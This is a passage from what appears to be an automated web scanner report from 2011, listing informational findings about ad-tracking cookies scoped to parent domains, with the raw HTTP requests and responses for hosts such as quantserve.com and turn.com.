ZAiIOBsExaf3w/UqsLKnEEfBAOdkszkCRjXWVkYMZo6IHARG40ewXnt8cJSKVE3oOip9agCbzmrtPWOaReve5aLG0lr9OIcf3aDk+Hnszhvg8r03gL5I8w+RtVXu2UZuA3YM8WiVKIU6wfKPy51+OVe7Q95dGFrMRh970/GxOTFSufw2PPC5Vvob3p1XdqBbTtlrW5IKTmd3qT9h+WP9SSEU2l2DTlFKn3+kMTCFh8f6TiGIAK4Spf6r90UBW6aqe+Fc8PRIh8p9MWTbZxccP6FPLZm6AfufZAieLeK1vs+kLVZhNB4jEfS2Q6dled0HJ1NrJo8sIE4isvuN63h88PMtD3DVDcqGxBmekM1gy6hAmHOSRDLm3e2yvxWyEFndBFHrZ4nxfAfUOJUVorP9XNxf2EBxM6AACQsUo9I5pJGKlOlK2WxrT6/xAzh8kz9+RgqqzAQmVz1TC3Oyk9tkJt3hfnF3VB9uCCL2GykG1f54ym9QYt5DrrMj3aGv35x0el5tK4c7oA4h4EVzB78hK5TIjOW1YkHftg4PGC3QZ5YgRKg5vBHzIDbipGgiNe788gpZfyXQ4FHeSRd0vaAH3PWMcKW7goiiPN91n/rZUWmy+ek8I+

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_8mNC=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4jOheHIMHvC1v6FY5BAFiE2lu64fTXbwk32ILzQmufPZU63k5ONu2v/oPlIcMX/OHb51RFGwBYRw8fBVw0aNn868fOK8Dy9ww0TAIgHMczr3EMFgE8G017VVOyoVGkKxE0WjD8BB8/8jj7sUVGGL6xcF5RPx2WkBN8zk37CtNk/eV2CIxCQ2+JihmeXWoV8B/zkMCkb253a/s9fWcA/Ac3jvLxuOpf0YYQ1ffPryJv8e6p0YW3MPo64WfrrrSXUixD/B8/jeBSwjLhtCVtSnBfdqT1qu883COe0/8WdCdGlIU/ksRDzOZxNnJM9lxwQ9eG+QsGGQjBBEYqh7tKGXRjeSvtm6iX76M18hiqcN77QiO2ORzJDpmafb6GXgJFxs57Blu6FJE7Lxxvz+cR7ly9rR/cBwF2yuXBmEaXk57rx4zwucslSWZbI38ZvvrDPi1yajK5LbOlZKjwlutxiIJ9z8GT/AIqemlToJ0BpKctDBmQ9inrRUNw5FyUG4WiJiREYYVJ2esG6VGdRGE2Ea0U677R9xpsw/NumWG9xFT0kImfMjeKrvtMcWSCCz7ICM9rGdSFf53yFYxdBuB40JKcNZIS42rPWKfbd1iPVGQLrew0hnm6EnL7MGkXyNHK+Lsq3WYjcfe4GRiVvM2dZaP4xyryEJ7l4RxCfzY+x4qm7vuOYXkL3nTFiJfoxFpz0Mtd8FYH9cfOo3PD/Tzs6AFsm7l06fPeimD1JRaMTNnmTaGdCJcZrQDHLfiAp8es3jILvbTkxsAOVy0LGdlYw5mlpUMAElqgKp3SUdFfjXX6mHdqI2Pcnt; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:37 GMT; Path=/
Set-Cookie: rtc_IF8h=MLvv+TMxJohmprbr/FOrg2mN7iry9EJR8nXXGp85AnkmlCJ3Dn9/8UQviHrUnHZTstC6vjeHIYOASHlo5yCPSON/Kzv+DA66ZWoDWmvfpTXDttj/l+nlKjcyTGSAoOAUCV576jhKnqvTusSYHas5qXZDkI6xS9wt9LApNogiFtwZ7SpzZMhc7jIXMasR6wtEYgUXUx8MJpjmx/xvfZdXqh3zjf/RrSBzApv/gUzkHzES/IpGTdkJqQGQiF+W3z9F9Rxqsgmkb3o5WC5E7roIcBM+TtpxMvj1qvcu+u/ZVcmg4SqsLEJ0B0KBPUCt3U2HP4oczq8bMwY5uzZFU7Lwq9oHwEAmKvlbxi7sWFx/6SL9iRRb2Dt7Fn0DGLZlLA8gSCfldM4bsJV1HlNvkG6Pt6xK3kTf0bvU6J2fNbpCwrCNbiBuVcriSwtqN2H2BYoZhaJU46bKMHR9q6X71cr7Dl3wqz+rdQn7YomUWFm6uLaTZLuynUKKvr5E3ESnRiRSjJWwGa1PGymnQ7smiHRkrgJ2lxs2USXunhEejw9d/SBKnKCaXybXGm3HgZFD2+JafTAV3XQTwewH9RDAVQ6oDlz+pI9/BVqQBe1ra5BuLADzbrud23T+HFJ3uZRzsKjx8pjhyN8vG+wbpTj9B9LIdYj8u10Fq9SxELvjczDwCb4TW6SeaVbW2eIfElYwVgTmxkbkl59rqDicqUNSqh5U4goElNsz+ILnGcivjCIaEApEUgvR5koxszteVYtlzGRh+tTWp6Q6veEPmlmhGmvUWMKpfxqdAhmsPSjiwhO0Coh+OLN9q4HeGXipUJ+0mKXrWXgR6slQUCcKQrTr1e9hvijz4sj2xN5mhDsGCqF8DTo/Dgv2BjbOU1de3wlIzAn1wsniQU/ghTvQQY+6Rp4+vqTuJN9Whf4GQNsMamhaDatlyWn+vSuGskT8PO0LzQHDU0D+Yt7rpT/CSNusy8FvAIElyCESMQWaE7WuRzEpHspHMogThPEg4fy6KZnz4T7hZ48idKAHSNJiODjSEpU11qbB6VKVGOVvIVuxAKk0fy8ewE25EoGO1Zdd0H/YjRMb8ikhoZ+VQgysPwEndvKP1KRYlTNG/fC8BmwYI5QAikGI5BX7Bu7rAw3k5OJFtg+qz6qGxpF9xqng9FTwlIhIf/XEoPRabDi0X9LzTHuLFDYnKI6giiw+8n1rlmpNkdn//SGjRFpx0M/2xWh72CqM/Z+FZg7h4A7IKb2skR7VDvbGbFesDGJXtqWNCH/f9r7wlBY50bA6rhsvcVHY9e1g4iqN3+8ci0QZjwuWixZVThMOl0bn4LgXSq3M8gCeq52NR5A9jcWCDrf77Zb6n0hArKnQ676Qjir2+YwYGzncffOWxDeHip9MEOOw1kUIg9f870t4uhKGb/XXlGXkfBkEqtflnTGLJs9RgRKbYebjCfR3uRnhkHncREApkZY+TX6kGQjunSa7+Iqen8Kd/RLxGO/qZqd/UT/dLlgL1ikJ4ERkqjCZ0dsE0yMY9AYguNlwffDEHU2EEZDWxCUDja1yId9JnrPHGQnD+KbnQd5FtqURV9ta2inHVxDSfse/jo+nwXftvl+F1j13PNpUPSM2sBRbr1SbxxX1rM1KD1FtdAIVJJwwf3EdBq5YF3IgnlDNfbHJZWpPDhr98emNELqpMihUn67txBKkRvFAhKYxq8qcneVfGelvk1jbIusDcCcbHk4vDpwJlEpBC8yQ46PvKR3SCAD0QRLseNu+7kyXnwpkFbr3zdQlGT4nFNo+jhZLQF0UOoPQmdF+Ur70OoxBtsRnStn8QijXplzYA+62TY0+Ck1L1b9KsS9zBxMZj7GrN4Bj3rx4G3P/eEGKaqOws4a/dIKVV915/hd2cm2lJoeT8Sm+x+1pu2413qTHDtiBpzBb7JHzi70cpWXiWCIfZ7j+aTcn6muisNbIUI19WfOFfQQGwpEAiLMfGGqineuBOOG9FbJcxtrJzQSWMp4/xoy1bsX5t/+OIzCFwc3ZIM9PMORxTfH4TZ3rwPKUIJV4PDKMQkx4yk5mBJMfl7cbniztf70bGzq39fPiP5a+ipVGXgxI+xdgG7Scya+Bxi/cf1R0+V0LY9vPzHZhJFN4fdiPXKQaeQmYg9etY2oNP070WIj/ZCaKwkmNOBQqYmV2AVx1RDKE88Kg7Cry7DV/EFjUbSz75rXMdoEFmV3mUn9fsBB+kEa1j2oWrB8fijw5210ABpzyH3SWymEYRSQpZrH69ptTvNxKpXX9XuMeG4R8o+ZtV3jODgn7hTGlJndQh1xUAmO66keb7AhIl/lsPG4g8NUKol25yvS+qqhKWlgnghY5ZLvLmaQGDOOCekjGo/xljdVQsfbmRkNezRPaddqOV4NmZhxYMJC00V0oKzgSlEd6oBWLbEB5CS8dgQbploZy0vcq/QLlPSEZD+btkxUl0HK/5QMvnA/k2h8UyEbqEORNd3KQbPm3l+3snajYKzbD+PkpjmdpFWFgYvOvnMJfhEfy/gbFmPRzmUpet1Gg9/gCg0o+oB8dfO1vO8hKFOwVxFw0t5RoNMLxO3D3VB+xDtXSMeseQKjFVA9OADcjokWFlb0mqnobmTMihyriwtOoKaMPYeGcdgRNSitNpbyJnUXwcO0pXK2ON2BmQHLhD3OpUxNIhYoL7Wt+vhCNAKN6OXsXd/hHzjxQnCn2yq2LvvrcjWbp4KQH; Domain=.revsci.net; Expires=Fri, 11-May-2012 11:37:37 GMT; Path=/
Set-Cookie: NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4df0b081&1&10592&4dcb7bc9&271d956a153787d6fee9112e9c6a9326; Domain=.revsci.net; Expires=Thu, 09-Jun-2011 11:37:37 GMT; Path=/
X-Proc-ms: 4
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Thu, 12 May 2011 11:37:36 GMT
Content-Length: 759

/* Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC) */
rsinetsegs=['K05539_10579','K05539_10529','K05539_10592'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsi
...[SNIP]...

13.77. http://pixel.33across.com/ps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.33across.com
Path:	/ps/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

33x_ps=u%3D7708659745%3As1%3D1304431102142%3Ats%3D1304431102142; Domain=.33across.com; Expires=Fri, 11-May-2012 11:49:38 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=454&uid=4dc048d9159e4ae3 HTTP/1.1
Host: pixel.33across.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
Cookie: 33x_ps=u%3D7708659745%3As1%3D1304431102142%3Ats%3D1304431102142

Response

HTTP/1.1 200 OK
P3P: CP='NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA'
Set-Cookie: 33x_ps=u%3D7708659745%3As1%3D1304431102142%3Ats%3D1304431102142; Domain=.33across.com; Expires=Fri, 11-May-2012 11:49:38 GMT; Path=/
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Expires: Thu, 01-Jan-70 00:00:01 GMT
X-33X-Status: 0
Content-Type: image/gif
Content-Length: 43
Date: Thu, 12 May 2011 11:49:37 GMT
Connection: close
Server: 33XG1

GIF89a.............!...
...,...........L..;

13.78. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=EMoAJe8kjVmM-5GL0ZmY8frRi58oyBABwwEB3QaB1QCa0aWJVAsQ8Ys9HNGFnDDCAJKLPR1KLMUgsqOEwdP-EQwgDB8QggINIOIAnRO7YKkZLHQxIIILsywStxxIP-FMWRtTqB4eaRAE0gDokgDDAOw0DRsQnSk5SjiyMA; expires=Wed, 10-Aug-2011 11:38:11 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1869178149;fpan=0;fpa=P0-487374334-1303349183888;ns=1;url=http%3A%2F%2Fmediacdn.disqus.com%2F1304984847%2Fbuild%2Fsystem%2Fdef.html%23xdm_e%3Dhttp%253A%252F%252Fwww.foxbusiness.com%26xdm_c%3Ddefault5912%26xdm_p%3D1%26;ref=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=;dst=1;et=1305200291459;tzo=300;a=p-94WKwgUwZHlfo HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://mediacdn.disqus.com/1304984847/build/system/def.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EKcAJe8kjVmM-5GL0ZmY8frRi58oyBABwAEB3QaB1QCa0aWZVw8Ys9HNGFnDDCAJKLPR1KLMUgsqOEwdP-EQwgDB8QggINIOIAnRO7YKkZLHQxIIILsywStxxIP-FMWRtTqB4eaRAE0gDokgDDAOw0DRsQnSk5SjiyM

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ad.yieldmanager.com/pixel?id=669180&t=2
Set-Cookie: d=EMoAJe8kjVmM-5GL0ZmY8frRi58oyBABwwEB3QaB1QCa0aWJVAsQ8Ys9HNGFnDDCAJKLPR1KLMUgsqOEwdP-EQwgDB8QggINIOIAnRO7YKkZLHQxIIILsywStxxIP-FMWRtTqB4eaRAE0gDokgDDAOw0DRsQnSk5SjiyMA; expires=Wed, 10-Aug-2011 11:38:11 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Thu, 12 May 2011 11:38:11 GMT
Server: QS

13.79. http://r.turn.com/r/bd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/bd

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:40:08 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/bd?ddc=1&pid=18&uid=CAESEA4m3NbIVFSubIriNyJB6xg&cver=1 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&mktid=40&mpid=-1&fpid=-1&rnd=7978057364051197680&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=oZ2RNEVNFLw1rkIl8X-P-yLlEJpCYSMxdqNq6lvFdNFh-L3XcPmT4hHXOQgApIlYc3paHra2elvjH7hCid4MB0Y7JvKfSWNYnBltaP_EmvZ3jqED7k2YniAtZPVqfFWyqMSMg2wplko20za_zfIcXaDNf6CpNnts8TY8puNrbeBKdSjyOjws--qAHMHtbI6SyKBbydkRUpjuoBRWw9N2QWlLrIWdOijpjnNbDzxMY_cujCK2ugPRrtIQW8vfBoRxYKn_QpwzLsdSa65JQRSgSqax_mGBSfFmQ_yHDdekCqC92jCfL0XfIi3TKkhnegsTVS37Q_gdeVmm0ScUExZ1lbMOsVdmEL_0OjsXyZIn8546ZEBGWfN7asBcma8YFCDHyX74acgH1t-jhoUfZVFCNjWOWvzW5ZM77GgXH0zm8oWnOar6PZOl9RnITYOFSWGYaDzF7S4neHm1ckG4BLqONRpiMKjy3MU458qcQHaQL-0YgFsDPAGl-fbgR48rnFrJ6wT1IuXC7mrUivjuVTQThVRvdHABpFM3tD1v5DXCzZ64QHqMXP7RMlCGzImxlIQTzRgujrVm0N9W2BwnCL_E1EHZoee2LjdKxjrsrZzN8FgYwoof2TuxobdviXvpMnEv81pDaQWZ60S1K8hgQ0QQAXfu0wxu7TmpeZh8RAxVSexqJ2LLq9JdStUDbLo5lTJfPHD19oyCm6lqmb75TpSqL6pr8ipq7WyxO6Ew-I0HY5wJflUQTdxXpAW4Vnpqg7w44X_zfDuHKSw_Nn3jdP08Szc46mXt1UoqFp0M9jO1k8P42EGyAyRr7YhegJwMQPqqUCJ3ATQBZk5SYexXtpsdy6ax_mGBSfFmQ_yHDdekCqCUBFYqyi1fHJyWiOfcfMTfgr4RpaCyPW_NRBa32FhMmG9vYGefuwSJ954i6NepjOZKvS1xYZ0Ss4Q0D1A3NBoQyX74acgH1t-jhoUfZVFCNnao7o-KEpvjqYDs5soT116oq-KJHQhjQmU4bTdez02J9dQy-ZN7OOs-kGRGl7xpemvhGQ8hzIqlr1IrYQxp-xUYgFsDPAGl-fbgR48rnFrJh-3J1YLh96s2Sov-e5Z1o1RvdHABpFM3tD1v5DXCzZ4xxZ_RffFsDnywN1GkkZV_5Uv_RIvgSU7i6xm2dvbjnkHZoee2LjdKxjrsrZzN8Fjq5xh8lQ54K_u30ofXMDvN81pDaQWZ60S1K8hgQ0QQAeUZzYxmcCX-jt_KTaaPcVoJOvIBlFFRgh0aGkP2j5peH6Nkss0iuJOnMv3-09gfh2rrcKik1-oIrPtZSMAqqQ8JflUQTdxXpAW4Vnpqg7w4_2s4Bpo2uZfDxG0VZFB88Wk-VgL9u-XI58uBKvrz56O3iu9p-J24_EGM6hyagMn2YEmkLg5zZbK-JWIvvwrhwhPnDUjHFB6vhhdIIEEGSp2RC01-sirwoYxJf3ssEn49prH-YYFJ8WZD_IcN16QKoH0UI20YAgyxkHiw8lIAx_mnb-jXXCSXp2vVTXzmr9pZcL6p-XT3jN85vkgaZ8vUd92-2pnQD2n21e-ITIgQL_3JfvhpyAfW36OGhR9lUUI2W0_XCWcb8zsqQ8DimFX-Uu8v7HHrFL4nIbaIJQ_o1sPTa-Xsvzoz7XjqWNTCt3rZYrf92fSurscMt_1SV35mtBiAWwM8AaX59uBHjyucWslDB1wwanEOL6qzMCUQo0ieVG90cAGkUze0PW_kNcLNnm1cdjsO0JR2cllZViOXnQ3uVf8tWzflWdHziO5SokVWQdmh57YuN0rGOuytnM3wWK2DU6rMC-wJwy5QPx_qifTzWkNpBZnrRLUryGBDRBAB5WYyOFQ5ZRNL4sHU3RtcuUGDyFx-piXtjZp5ekRGkYdz2wXbubEN_3mjRNBG_Idw8LkqJ96VKyr7U-y-sK8_Lwl-VRBN3FekBbhWemqDvDiLN5_5A8LFSovW3C4K386c_Ql6lVvJ2R2O4nWyUN5iRLeK72n4nbj8QYzqHJqAyfbLD2N_CM7u1mydoDMYTC_mprH-YYFJ8WZD_IcN16QKoM2VicvKbeYEcyMla3yEoQ2RmR_rbYcUwB-9MYK1HnZwScQ9V5hHmJlTe-T75MjzqreTn2hkb9oAtGT_7YF8ZSHJfvhpyAfW36OGhR9lUUI2tqCUb5yc9vn09nLuvbx5GXq1-cHJUfnrcooYGbPAvcjTa-Xsvzoz7XjqWNTCt3rZ7d3RTRs3cZwFLR9Y320UThiAWwM8AaX59uBHjyucWslF1uoT-2LMDmY4614N6HcfVG90cAGkUze0PW_kNcLNnghS3x9ESIRPKJqzarj28HG_LjieMq13s3cgAdN8xM7aQdmh57YuN0rGOuytnM3wWD1crAQAhXFQgOVLYlHadeHzWkNpBZnrRLUryGBDRBAB4AW9z3L32rHXq7G7Z3kib_dL8EW6T8qzMgGN-UfAL4hvOC7fCrKQjypg3ZZDmIIRdMbH4VAaTP3yeuIT8bUYpjNxWhaps5334qiA6przrOBR9dy7mebSJ94duif8USNC67lakY1-Wx08qAAHUQtknHQ7xnjMvY9ljRz8Oso1hdOAl8yAkjzMu60avymcp27zhmAaygIZH6vh6o5wNjgjNdonijTulYljYeiITtnJ-obiQEWW_mIpBZLcLt_p7SN9vijLbJjf63yiGSwbKyG2dGugnhWf2jLB_cEY-73f83M-Qp-ZlRKwcQuBR1ztGiFSZj4LpSPmviro5cgHdk9eJt4MMqelir0IqM1jmPswFFzniMTjL4-dEMDP4r05gYjUzZycDMwIM-JRZdaXayxbU-AwRV7xlAm5ebgZQKvg7WfQ1UAcQ-GE71_vlGriBwl0yRDK3jK3JAuWDuOfs2KJrs13LhVuZ9GXfqJdAYatFTpdnV7arjamYRVy18OpW4nYo4YOSWlJdDfSV-fwq8HgeaN-3cp1FzgjDVOVLZ2VhYwL507hxRulwL5vm7cb7KsO1XFt8hxAzJqAYOCL7WjL0qxTgxm3fdOYdOttFZUxr5r0A9mv0F_QBoXzpi8rJ_c6DrDzy9pG89s1Q06scIKHZgyDJezpNhgVkSmU0kpar5BAJuG6G30x3tmAb2j7nSNJ4ut2MaV0ROqJMzw9NFFerOKSq0jn7Z8ml_Aq0G6qyi-_p_3NfTE1kiDIdgNbUC9syknt2eSBNZW0WI7HO06yZy2SvSB5gCfomHd71CeO9uXWDgvZffEe1VrTUdxOH4gfGVkOqzE_jRzdjQRhmyVCwoc_2QRp83dWLTsWWFAIqAtnczfxrFIRAQH9jWHUPud-tHjVA42UgJXi7E-Ez_fNnbIdhDyg95Mh1WycRjhJXv8ATRtHD8vb9Vg5SwvqNhrNZsvJnUfvCegfWPkjFXygnPnoVxBMRnVTY50l5bdMYetqdZbuYYw5z5lUxbXkdIEwU2hncdLYoeK7ANErfukyrvNB8AfsR6D54cbJAyko95iDfbO-X1OEuSdYaVrz3olMX3vxG0LpmKD-Soh53aYJpCPcsWWbSJo-8gq8nYPQ6ByEPHScXR_eqXeoOaqn2ootB5duWe6vOtfx6TZyGJGsbGD1xkmmTSZiXiOf1UbISqo; fc=Son_Yybuxp_4VLqW1c6IRgpgpID-Wq7vfB3O6HP3oULbQqNNvLUmxUNQQBPMgfFerRqQpaKBKyof5NYMw3qm97r0GrmP14kIO_P1S_Kd3R7cCRX28vmQ734FGllQxEga7WNeyCp05SdctLfte-TCTbsP4cT5ImSiiIJxR5UGOwfPwbRnR2LLF13q12TckziOyzAmjEmfIrmEjGls5nEu5ZuyzRHZQdTq6XVtL0hM6YVgYsYM5nTvlmY3l5bk4g84r-nKZ1rQQJqck6Yvy9KW3W91gPk0ifU2Wnpfq4coyDul4J5x1VDDQsLplNf7fxlsqch1kSkJnLuIM5kQxIBrA1AAJ5E2NNXlrPeQUMuax8t_TTqS7k2UZnQ2_qo9uJoS; pf=isLx4tnkAuIiDQmRHjDSl29yIVHNlRpRhyM6ibTjqZN4MaYm-hBniQ2x_WbJU5VofR8HsN28iFo6HdZJoYg634vArNzG1QqMSLzk0Y7eRlHjhKTZoZfl0UmM4YAE9VltLd4zaBhLXK6dA3tQW6GTY_mhMXcZkp2CGVOUe9dNA1dLc3SbvsAbpvKUhZ_1F-gMqt697FUnnCyNJa5eXuHVqkYk9oOpEEnBnxokixh0TAcnTloknPCKo_m2KWZ0znMHGX1FGgNaH1QNLww2o9FWDf92KpcEjM9puswoJnlptpg_Ua1SMLgL8e4oitE3gQEt0IYL2CsvvDQbzbzoZi58WVFU2_HfnlKzH2WjiB0I74yjr5MEZ55HOjknaleEn8uqphJLAkUsMWh_vdfMYZ4DsAqVswvpKACSML7qepV3TXcVzrbaB5_N9dG_mUB3DBQpHCwQOntCh3wzWqFyTO9sCmbID1pM7GdJCmEvQvhgCerVKPuxNShLT7BdA74b9PIpJFJv0bKrvIAXiY5kxeBqDZM9McQOVbCG47DlR2tl0RZrXlLfPhjB-LAv0hBAzyAT8WyNLsptBsE0pyyMNzm8KTDTfIrxKwKcgVAF0j3DpG-Ah_L2mBEhIVZyz3v4hUv82NTphEWhwEZTsAeCcCRJGQ16FhMiQjewtL7hTKHHtYomz6Mgv9ntnMipgM9tObOSRi5sdEi6v2SSHlqkNcZ1Insylw9OuZiK2Z9Z1ZInGi2VyX45sYdTfBGAwKx_QKsRDOFWXyC8BwuYcP4g_M8_5sW-t1RZ1RZoZx7lrsMhMHodIDnIK6ly468s-StQw1rNNbnQrRiBaZdoox-8l-4ssS8cnCaJbHr6avLClL1L-ZgHVS17gTosFV1LPoOJqMoPVx8L9V4GQ55oLDrsRz9rTx9FeqPBBvBYGO1SdqujwXgi0vu0SmNRlepXu23ylR2425RDJExopm1fmCCVJh_u9NPFwH371j224eEs7ZO_Ajtb9hEO5hT0MYYwff0a4aDJ8dVm-HlCOmQllIxHHVPmqo5POfQNhu-I5BtsxdNdff3L0rrE_rQqKLBssQ48bm9_mXQzReNjx3lXy785TIo-y5veNkje6bZOCdvzPqpApnQKiSIwki5f-ITER4DSY4219M583u_ZPKiH6Ea4p59q66AhR0SCoMm0IXZ_t5_lhYgWzvjS6P-UHDNUBWN18PSjuJp9aVntFwJIXFrQO8XwyhujvEUOLmkRuJtqn5C1FWr3rHK_ua4i4QGywfYupaV2fuScMz9nUn-9DR4XMyfjq6f9MS-DaFKt2RaSz_BBjJKiIA7uafV8NNMTbjh0U1qug__vmYjXW251NXxsKK_4qFzSypNenDnJ6HQ-3068v6hBJfEyf0yd-2fLUXx6iqh9wMyw-RaWvEndJRgsZP3zOckxnpD1Bh0doyFi9Md6WZu8mx8U3kUMFDpZ0SqI-5d7X_-8-uyf42RpEQk10dwHo6E6IPJGWiCATH5pcXIPM9vPxG-uEMBzxe02yDopCwxH8LV8wxWtacb8pPjx7gKH5cGBR1KqovJK3yVBhrs2V7Q; rrs=1%7C6%7C3%7C4%7C1002%7C6%7C7%7C4%7C9%7C10%7C1003%7C1006%7C2%7C1001%7C1004%7C12%7Cundefined%7Cundefined%7C1008; rds=15106%7C15104%7C15106%7C15105%7C15104%7C15105%7C15106%7C15105%7C15105%7C15104%7C15104%7C15104%7C15104%7C15104%7C15104%7C15105%7Cundefined%7Cundefined%7C15105; rv=1; uid=2931142961646634775

Response

13.80. http://r.turn.com/r/beacon previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/beacon

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uid=2931142961646634775; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:34 GMT; Path=/
pf=WDvFewANz5aN8ro--w_16OWau98iyOvVBtELDm2CHBX3Y07UZZPNWkK0EEUc7vAIfR8HsN28iFo6HdZJoYg637PetD2cA8xvvUoLcxur2sY9fHKHYMFFN8lXedjo-9PSl7cxfV18_Sz5Ng8ld_X1HRD_Z0wavqycrsQiFm9QZ_cEiXIeYRMvKu7l5KMvI7vm5dIdkRDTWQbgsHbEqQ37nNUVLZ0Aao2DGLgHCvs2_7zryFKliROAgCua8ygDf1pakle_qtze5tuAztFdGBKVECTB7Xzn-K67XFaryRa1HZxI2I4ae6CgiuH5tIIfNklQtPVt9L7Re7DJQWcHmwQpjCrTXh7XKumV-55sx735V56Jk4XT225c3_swkSHYmMoPRdlNOnviq7ipDvEZZ28_V5Fbphl8v0SeqcE1X29Q-XyrU8sC-NXPyqnKzoVqupwvxUtMxmzso7-ONZHGiWUGKIB5A9jubvG7JBvQXHiT1KdKWNG3ES2yEoYLCL7aUl8asmh83Bb_ySNRje2rNa0JxJcm9v4jeIQaPDoq3ACAJUl7IbOZHAHBMdmXe3UBRvsYdSrxi9Ecxa8kZThzZO6aeaas-roJj2Q-EkNpkXZbbvVeMLxvS4wRCkwyiayF00GI87TrIFafDjcHfusIoBCt22M89fvyKULVFnbtZFl9IUsQMSIRccJ6LX18XE1Nig_UUM1LGzqpcEk-rCFc1h0gpIm4Jd_QzLPdPOtdCEBAr8-8Upa6arFOpzab1pE0nDFPJkwT2KZhbD0CfG9KxUTYwAFaSuXROCWsvv1Xz_lvc5qDt8mPl3WKPA4r9Z1gJfOmbqLNFcfz6PEd-FrnEa4vrIqD8lkDUeWN7s4a9OueTLFISSSIDOlXxHejUMi7IABVrusAKookKb0pVS3987apnl6V-rQ-B6QHbtXcTAYqkWjgVeaX3klJElZGLoYa-ZuDh0Rayp3OOR_oU3ir4FomV_sy9RDK5uLzRDwQH4f7LIcJgVM65M6j7w5NDkyKKdRFf9BQS5tHIpXFtO5hdEHLwCf--aHQI9IDIlxI42NaIlUstjD2A4WMWerhztm-_a52YMN7bn25_9xS91STZcx-i0-bRhoYC7RhcSIMsIQ7o0TqwXhB0ipLjKZAXfISS2P-JyYO4jfdwozjhGCHarNmQ5BqLyG2YANF-FI5msFkFMG8UVACbcQT2qm5FtDkcuLLHIdQZhTfGyFVeET5DlWfImOBriO51iBaS4__ZMz5kSB3HnuOE2bKY8AnlZVaxKnjE3wXoM7fzLRqnlHVUJnantU17q7RnOwBeHgICWJsFQhc5wErZcKgnhVskq0bqyxhv_wjCGmN2gxKw0dhDnPYP_0Mmfi4j9yfMUwSdI9Lj7zJoKt8QnzKrSSc_RuX7K1PHnQtlNj8JmeKpHFW1PRfTb0fyYghIq-IITFkYc_uI9YSpJVpN2FNg5u_cdS3RjPCyL40JPKaH3V39NisQu1y367wTC7MmfceuL1HdWZa_yTHCCN0MTXDwR0tX3R7CB1nx3sRNCxKgOOP_38C_7cJoCDagfHqnmufnkMRoDa8dwQ; Domain=.turn.com; Expires=Tue, 08-Nov-2011 11:39:34 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=6YtkBrDAE9IC5hFHjnB-yIAsYMfEACa-nO9phD-NOvPPVx7awJtIT5bFbQ7adJJ3wc3E_rvvWKH9Who8_my78Q&cid= HTTP/1.1
